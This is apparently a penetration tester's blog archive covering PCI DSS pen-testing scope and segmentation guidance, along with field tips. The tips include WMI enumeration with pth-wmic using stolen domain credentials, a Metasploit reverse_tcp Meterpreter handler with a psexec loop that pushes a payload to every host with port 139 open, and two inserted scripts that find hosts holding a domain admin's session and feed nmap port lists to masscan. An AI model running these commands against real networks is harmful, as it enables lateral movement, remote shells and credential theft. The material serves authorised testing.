Friday, June 24, 2016

Do You Need to Perform a Pen Test from Inside the CDE for PCI?

But what about Pen Testing from inside the CDE? Is that required?

PCI 3.x has no requirement to Pen Test from within the CDE. This is a common misunderstanding, propagated by a long-standing lack of guidance. With the March 2015 Information Supplement: Penetration Testing Guidance, we were finally able to address this directly: 

"It is not a requirement to test from within the CDE to the servers inside the CDE; and testing exclusively from within the CDE perimeter will not satisfy the requirement. However, when access to the CDE is obtained as a result of the testing, the penetration tester may elect to continue exploring inside the network and further the attack against other systems within the CDE, and may also include testing any data-exfiltration prevention (data-loss prevention) controls that are in place."

This is not a requirement and should only be done with care. When we have compromised the CDE of an organization, we will examine data-exfiltration controls and egress rules any time it is safe to do so.

Hopefully this information can clear up any misconceptions about scanning and scope and what’s required for the latest version of the Standard.

Wednesday, June 22, 2016

Pen Test Enumeration with WMI

My client has disabled SMBv1/2 on the majority of their systems and that has made using many tools impossible. What I wanted was a netstat from each of the boxes to check connections, so I went down the WMI road looking for answers. That was a dead end, but I did discover some useful objects to query with WMI that might help your investigations. This requires WMI to be enabled, which was spotty on workstations but was enabled on all of my Client’s servers.

Find out who is logged onto the box
pth-wmic -U 'domain\username'%'Asdf1234' // "select * from Win32_LoggedOnUser"

OS build type
pth-wmic -U 'domain\username'%'Asdf1234' // "select Buildtype from win32_operatingsystem"

Running Processes
pth-wmic -U 'domain\username'%'Asdf1234' // "select csname,name from win32_process"

Active Route
pth-wmic -U 'domain\username'%'Asdf1234' // "select * from Win32_ActiveRoute"

All the routes
pth-wmic -U 'domain\username'%'Asdf1234' // "select name from Win32_IP4RouteTable"

Because I can never remember the syntax 
for i in `cat /mnt/hgfs/PenTests/CLIENT/PortScans/10.445-1\all.txt`; do echo $i; pth-wmic -U 'domain\username'%'Asdf1234' //$i "select csname,name from win32_process"; done
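As an added example (not the original post's code), a POSIX shell script that summarises the Win32_LoggedOnUser output collected by a loop like the one above into one unique HOST/account list and answers the question of which hosts currently hold a session for a given account (where that account's credentials are exposed in memory). It assumes pth-wmic's "CLASS:" banner plus '|'-separated header and rows; the SAMPLE output, host names and account names are constructed.

```shell
#!/bin/sh
# Added example, not code from the original post. Summarises Win32_LoggedOnUser output
# collected from several hosts (one pth-wmic run per host) into unique
# "HOST<TAB>DOMAIN\user" lines. Assumes pth-wmic's layout: a "CLASS: ..." banner,
# a '|'-separated header, then one '|'-separated row per instance, where the
# Antecedent field is \\HOST\root\cimv2:Win32_Account.Domain="D",Name="U".
# SAMPLE is constructed output for two hosts.
SAMPLE='CLASS: Win32_LoggedOnUser
Antecedent|Dependent
\\SRV01\root\cimv2:Win32_Account.Domain="CORP",Name="svc_backup"|\\SRV01\root\cimv2:Win32_LogonSession.LogonId="999"
\\SRV01\root\cimv2:Win32_Account.Domain="CORP",Name="da_jsmith"|\\SRV01\root\cimv2:Win32_LogonSession.LogonId="2345678"
\\SRV01\root\cimv2:Win32_Account.Domain="CORP",Name="da_jsmith"|\\SRV01\root\cimv2:Win32_LogonSession.LogonId="2345690"
CLASS: Win32_LoggedOnUser
Antecedent|Dependent
\\WS22\root\cimv2:Win32_Account.Domain="WS22",Name="localadmin"|\\WS22\root\cimv2:Win32_LogonSession.LogonId="999"'

# Read pth-wmic output on stdin, print each host/account pair once.
logged_on_users() {
  awk -F'|' '
    /^CLASS: / || $1 == "Antecedent" { next }   # skip banner and header rows
    NF >= 2 {
      host = $1; sub(/^\\\\/, "", host); sub(/\\.*/, "", host)   # \\SRV01\root... -> SRV01
      dom  = $1; sub(/.*Domain="/, "", dom);  sub(/".*/, "", dom)
      user = $1; sub(/.*Name="/,   "", user); sub(/".*/, "", user)
      key = host "\t" dom "\\" user
      if (!(key in seen)) { seen[key] = 1; print key }   # one line per session owner
    }'
}

# Print the hosts on which account "$1" (written DOMAIN\user) currently has a session.
# ENVIRON is used instead of -v so the backslash in the account name is not mangled.
hosts_with_session() {
  logged_on_users | ACCT="$1" awk -F'\t' '$2 == ENVIRON["ACCT"] { print $1 }'
}

printf '%s\n' "$SAMPLE" | logged_on_users
printf '%s\n' "$SAMPLE" | hosts_with_session 'CORP\da_jsmith'
```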

If you have a better way or know of a way to pull a netstat without SMB enabled, please let me know in the comments.

Monday, June 20, 2016

Meterpreter over TCP/139

My Client has closed all but port 139 of the NetBIOS ports, preventing me from using Metasploit’s PSEXEC. But Mark Russinovich’s version from Microsoft will work just as well, albeit a hell of a lot slower.

Prep your loader following the instructions at

Nmap all the 139 open ports and drop them into a file. Set up your handler. I use this with good success:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 4455
set EnableStageEncoding true
set AutoRunScript post/windows/manage/migrate
exploit -j -z

Download the original PSEXEC from Microsoft and run the following Windows script one-liner:

FOR /F %A IN (139.txt) DO psexec -s -u DOMAIN\user -p PASSWORD \\%A \\\Share\stage.exe 

If you want to use this in a batch file, double up on the % for the variables, like FOR /F %%A IN… 

Using Masscan with Top Ports

Want to use masscan like nmap and scan just the “top ports”? A quick way of getting that list of ports is to run the following nmap command:

nmap -F -oG - -v --top-ports N

Where N is the number of ports.

Example Top 100:
nmap -F -oG - -v --top-ports 100

# Nmap 7.01 scan initiated Mon Jun 20 10:38:30 2016 as: nmap -F -oG - -v --top-ports 100
# Ports scanned: TCP(100;7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157) UDP(0;) SCTP(0;) PROTOCOLS(0;)
setup_target: failed to determine route to
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:30 2016 -- 0 IP addresses (0 hosts up) scanned in 0.04 seconds 

Example Top 1000:
nmap -F -oG - -v --top-ports 1000

# Nmap 7.01 scan initiated Mon Jun 20 10:38:45 2016 as: nmap -F -oG - -v --top-ports 1000
# Ports scanned: TCP(1000;1,3-4,6-7,9,13,17,19-26,30,32-33,37,42-43,49,53,70,79-85,88-90,99-100,106,109-111,113,119,125,135,139,143-144,146,161,163,179,199,211-212,222,254-256,259,264,280,301,306,311,340,366,389,406-407,416-417,425,427,443-445,458,464-465,481,497,500,512-515,524,541,543-545,548,554-555,563,587,593,616-617,625,631,636,646,648,666-668,683,687,691,700,705,711,714,720,722,726,749,765,777,783,787,800-801,808,843,873,880,888,898,900-903,911-912,981,987,990,992-993,995,999-1002,1007,1009-1011,1021-1100,1102,1104-1108,1110-1114,1117,1119,1121-1124,1126,1130-1132,1137-1138,1141,1145,1147-1149,1151-1152,1154,1163-1166,1169,1174-1175,1183,1185-1187,1192,1198-1199,1201,1213,1216-1218,1233-1234,1236,1244,1247-1248,1259,1271-1272,1277,1287,1296,1300-1301,1309-1311,1322,1328,1334,1352,1417,1433-1434,1443,1455,1461,1494,1500-1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687-1688,1700,1717-1721,1723,1755,1761,1782-1783,1801,1805,1812,1839-1840,1862-1864,1875,1900,1914,1935,1947,1971-1972,1974,1984,1998-2010,2013,2020-2022,2030,2033-2035,2038,2040-2043,2045-2049,2065,2068,2099-2100,2103,2105-2107,2111,2119,2121,2126,2135,2144,2160-2161,2170,2179,2190-2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381-2383,2393-2394,2399,2401,2492,2500,2522,2525,2557,2601-2602,2604-2605,2607-2608,2638,2701-2702,2710,2717-2718,2725,2800,2809,2811,2869,2875,2909-2910,2920,2967-2968,2998,3000-3001,3003,3005-3007,3011,3013,3017,3030-3031,3052,3071,3077,3128,3168,3211,3221,3260-3261,3268-3269,3283,3300-3301,3306,3322-3325,3333,3351,3367,3369-3372,3389-3390,3404,3476,3493,3517,3527,3546,3551,3580,3659,3689-3690,3703,3737,3766,3784,3800-3801,3809,3814,3826-3828,3851,3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000-4006,4045,4111,4125-4126,4129,4224,4242,4279,4321,4343,4443-4446,4449,4550,4567,4662,4848,4899-4900,4998,5000-5004,5009,5030,5033,5050-5051,5054,5060-5061,5080,5087,5100-5102,5120,5190,5200,5214,5221-5222,5225-5226,5269,5280,5298,5357,5405,5414,5431-5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678-5679,5718,5730,5800-5802,5810-5811,5815,5822,5825,5850,5859,5862,5877,5900-5904,5906-5907,5910-5911,5915,5922,5925,5950,5952,5959-5963,5987-5989,5998-6007,6009,6025,6059,6100-6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,6565-6567,6580,6646,6666-6669,6689,6692,6699,6779,6788-6789,6792,6839,6881,6901,6969,7000-7002,7004,7007,7019,7025,7070,7100,7103,7106,7200-7201,7402,7435,7443,7496,7512,7625,7627,7676,7741,7777-7778,7800,7911,7920-7921,7937-7938,7999-8002,8007-8011,8021-8022,8031,8042,8045,8080-8090,8093,8099-8100,8180-8181,8192-8194,8200,8222,8254,8290-8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651-8652,8654,8701,8800,8873,8888,8899,8994,9000-9003,9009-9011,9040,9050,9071,9080-9081,9090-9091,9099-9103,9110-9111,9200,9207,9220,9290,9415,9418,9485,9500,9502-9503,9535,9575,9593-9595,9618,9666,9876-9878,9898,9900,9917,9929,9943-9944,9968,9998-10004,10009-10010,10012,10024-10025,10082,10180,10215,10243,10566,10616-10617,10621,10626,10628-10629,10778,11110-11111,11967,12000,12174,12265,12345,13456,13722,13782-13783,14000,14238,14441-14442,15000,15002-15004,15660,15742,16000-16001,16012,16016,16018,16080,16113,16992-16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221-20222,20828,21571,22939,23502,24444,24800,25734-25735,26214,27000,27352-27353,27355-27356,27715,28201,30000,30718,30951,31038,31337,32768-32785,33354,33899,34571-34573,35500,38292,40193,40911,41511,42510,44176,44442-44443,44501,45100,48080,49152-49161,49163,49165,49167,49175-49176,49400,49999-50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055-55056,55555,55600,56737-56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623,64680,65000,65129,65389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
setup_target: failed to determine route to
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:45 2016 -- 0 IP addresses (0 hosts up) scanned in 0.05 seconds
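The post stops at the nmap output and leaves the step of turning the "# Ports scanned:" header into a masscan argument to the reader. Here is one way to do it, as an added example that is not from the original post: it works on a constructed copy of that header so it runs offline, and top_ports_for_masscan, port_count and TARGET_RANGE are names chosen here.

```shell
#!/bin/sh
# Added example, not code from the original post: extract the port list that nmap
# prints in the "# Ports scanned:" line of its grepable (-oG) output and hand it to
# masscan's -p option. For a live run, replace the constructed SAMPLE below with:
#   nmap -F -oG - -v --top-ports 100 | top_ports_for_masscan
SAMPLE='# Nmap 7.01 scan initiated Mon Jun 20 10:38:30 2016 as: nmap -F -oG - -v --top-ports 5
# Ports scanned: TCP(5;21-23,80,443) UDP(0;) SCTP(0;) PROTOCOLS(0;)
WARNING: No targets were specified, so 0 hosts scanned.
# Nmap done at Mon Jun 20 10:38:30 2016 -- 0 IP addresses (0 hosts up) scanned in 0.04 seconds'

# Print only the TCP port ranges, dropping the "count;" prefix and the closing paren.
top_ports_for_masscan() {
  sed -n 's/^# Ports scanned: TCP([0-9]*;\([^)]*\)).*/\1/p'
}

# Count the individual ports in a comma-separated list of ports and a-b ranges, so the
# extracted list can be checked against the count nmap printed in the same header.
port_count() {
  tr ',' '\n' | awk '{ n += (split($0, p, "-") == 2) ? p[2] - p[1] + 1 : 1 } END { print n + 0 }'
}

PORTS=$(printf '%s\n' "$SAMPLE" | top_ports_for_masscan)
echo "ports: $PORTS ($(printf '%s\n' "$PORTS" | port_count) individual ports)"
# TARGET_RANGE is a placeholder for the network under test; masscan takes the same
# comma-separated ports and a-b ranges after -p that nmap printed.
echo "masscan -p$PORTS TARGET_RANGE"
```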

See for more information on how the top ports are determined.


Thursday, April 7, 2016

Getting Started in Penetration Testing

I have a page written specifically to answer this question at:

Have a look at the community section, specifically Getting Started In Pen Testing

I would love any feedback from the community on how to make it even better. This question comes up a lot and we need to provide a path for talented, passionate security people to increase their skills.

Wednesday, December 2, 2015

Segmentation Checking for PCI Requirement 11.3.4

PCI 3.0 introduced Requirement 11.3.4: “If segmentation is used to isolate the CDE from other networks, perform penetration tests at least annually and after any changes to segmentation controls/methods to verify that the segmentation methods are operational and effective, and isolate all out-of-scope systems from in-scope systems.” The testing procedure specified for Requirement 11.3.4.a in the PCI DSS v3.0 Requirements and Security Assessment Procedures also states: “Examine segmentation controls and review penetration-testing methodology to verify that penetration-testing procedures are defined to test all segmentation methods to confirm they are operational and effective, and isolate all out-of-scope systems from in-scope systems.”

This requirement is intended to verify that network segments documented as out-of-scope are truly out-of-scope and that this has been verified by someone with a degree of technical expertise. The scary parts of this requirement are “all segmentation methods” and “all out-of-scope systems from in-scope systems.” That could be quite a task depending on the number of methods used to provide segmentation and the number of out-of-scope systems.

Fortunately, the Special Interest Group on Penetration Testing, of which I was honored to be the co-proposer and a lead contributor, was in the midst of finalizing its guidance. Recognizing that, as written, this requirement could place an unrealistic burden on Merchants and Service Providers, we were able to work with the Council to provide the option for sampling. This excerpt from the guidance addresses 11.3.4:

Segmentation Checks
"PCI DSS Requirement 11.3.4 requires penetration testing to validate that segmentation controls and methods are operational, effective, and isolate all out-of-scope systems from systems in the CDE. Therefore, a robust approach to penetration testing is recommended to satisfy this requirement by actively attempting to identify routes and paths from networks outside the CDE into the CDE. All segmentation methods need to be specifically tested. In very large networks, with numerous internal LAN segments, it may be infeasible for the penetration tester to conduct specific tests from every individual LAN segment. In this case, the testing needs to be planned to examine each type of segmentation methodology in use (i.e., firewall, VLAN ACL, etc.) in order to validate the effectiveness of the segmentation controls. The level of testing for each segmentation methodology should provide assurance that the methodology is effective in all instances of use. In order to effectively validate the segmentation methodologies, it is expected that the penetration tester has worked with the organization (or the organization’s QSA) to clearly understand all methodologies in use in order to provide complete coverage when testing."

As long as the testing provides assurances that the segmentation methodology is effective, testing from every individual LAN segment is not necessary. My recommended approach is to perform testing from network segments where privileged users securely access the CDE and sample a reasonable number of all other segments for each type of segmentation methodology in use. This will meet the requirement without putting undue burden on the client while providing the assessor or auditor with sufficient information on which to base a determination of segmentation effectiveness.

Friday, June 5, 2015

Do you need to do an internal pen test when the CDE is in the Cloud?

We have a Cloud based, virtual data center that we access and manage using a 2-factor, on-demand VPN to a remote jump-box from anywhere in the world. As a result, our corporate network and admin machines are considered out-of-scope for PCI. Do we still need to do an internal penetration test?

Our experience is that these tests are limited and quick, however they must be done. While it’s true that in this case the in-scope systems could just as easily be administered from a Starbucks, the administrator’s workstation in a Starbucks cannot easily be compromised by exploiting other systems in the coffee shop, whereas in the corporate network the administrator's system is often joined to a domain and can be affected by other systems in the domain. The environment where users routinely access in-scope systems presents an attacker with a unique opportunity to steal those credentials or manipulate that traffic. Such an opportunity would not be afforded to an attacker in a Starbucks. The interrelationship of systems inside the corporate network creates a unique set of threat vectors that must be tested.

So for PCI Pen Testing, a corporate network is defined as having a common network connection AND localized common resources such as file shares and authentication mechanisms.